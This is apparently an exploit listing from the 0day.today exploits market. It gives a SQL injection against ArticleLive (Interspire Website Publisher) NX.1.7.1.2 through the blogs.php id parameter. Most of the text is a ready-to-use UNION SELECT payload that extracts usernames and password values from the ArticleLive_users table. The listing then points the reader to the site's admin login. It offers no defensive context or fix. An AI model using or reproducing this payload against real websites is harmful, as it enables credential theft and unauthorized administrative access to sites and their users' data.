[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ArticleLive (blogs.php?Id) SQL Injection Vulnerability

Author
BAYBORA
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10562
Category
web applications
Date add
01-01-2010
Platform
unsorted
======================================================
ArticleLive (blogs.php?Id) SQL Injection Vulnerability
======================================================

*******************************************************************************
# Author   : Baybora
# Product  : ArticleLive (Interspire Website Publisher)
# Version  : NX.1.7.1.2 (and possibly earlier versions)
Vulnerable script: blogs.php?Id = (SQL-injection)
 
---------------------------------------------------------
 
 
http://server/[path]//blogs.php?id=  [SQL Inject]
 
 
blogs.php?id=-768+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,144,15,16,17,18,19,20,21,22,23,24,25,26,27+from+ArticleLive_users+limit+01--
 
 
Admin Login->
 
 
http://server/[path]/admin/



#  0day.today [2024-12-26]  #